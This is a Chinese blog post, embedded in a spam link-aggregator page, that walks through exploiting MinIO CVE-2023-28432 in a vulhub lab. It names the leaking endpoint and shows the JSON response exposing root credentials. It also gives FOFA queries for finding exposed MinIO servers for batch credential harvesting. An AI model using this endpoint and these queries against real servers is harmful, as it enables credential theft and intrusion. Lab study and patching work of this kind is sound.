当前位置: 首页 > news >正文

dns网站建设国内优秀网站案例

dns网站建设,国内优秀网站案例,成都市温江建设局网站,做国际网站的上海高端网站公司前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

http://www.yayakq.cn/news/36657/

相关文章:

  • wp系统网站如何做seo镇江网站制作企业网站
  • 青岛网站建设信息公示东莞网站建设是什么意思
  • 高端品牌网站建设专人一对一服务成都私人做公司网站的
  • 新公司网站建设分录姐姐直播tv
  • 北海网站设计公司住房建设网站柳州
  • 做直播 网站的上市公司智能小区物业管理系统
  • 国外免费网站域名服务器昆明高端seo怎么做
  • 新手做网站教程艺缘网站的建设
  • 企业网站推广总结wordpress自动空格
  • 企业网站一般做哪些栏目儿童网站模板 html
  • 网站开发架设教育门户网站设计欣赏
  • 陕西长城建设工程有限公司网站网站建设的优缺点
  • 中信建设证券官方网站国外 电商网站
  • 厦门网页建站申请比较好杭州科技学校网站建设
  • 如何将自己做的网站推广出去丹阳网站建设咨询
  • 宿州企业网站推广网络营销工作岗位有哪些
  • 一流的网站建设流程山西省住房城乡建设厅门户网站
  • 请问下网站开发怎么弄荣耀官方网站手机商城
  • 北京网站备案速度亚马逊全球开店
  • 重庆智能网站建设设计中国免费图片素材网站
  • 嘉兴做网站专业商城网站设计制作
  • 厦门市海沧区建设局网站大型企业局域网组网方案
  • 查询行业信息的网站美食网页设计报告
  • 旅游电子商务网站的建设上海企业网站设计公司电话
  • 响应式相册网站模板专业app开发设计的公司
  • 建立网站费用表wordpress单本小说
  • 电子商务公司开发网站温州网页设计公司哪家好
  • 网站seo优化效果创客贴官网
  • 微信第三方网站怎么做wordpress多用户 2015
  • 从零开始建网站唐山做网站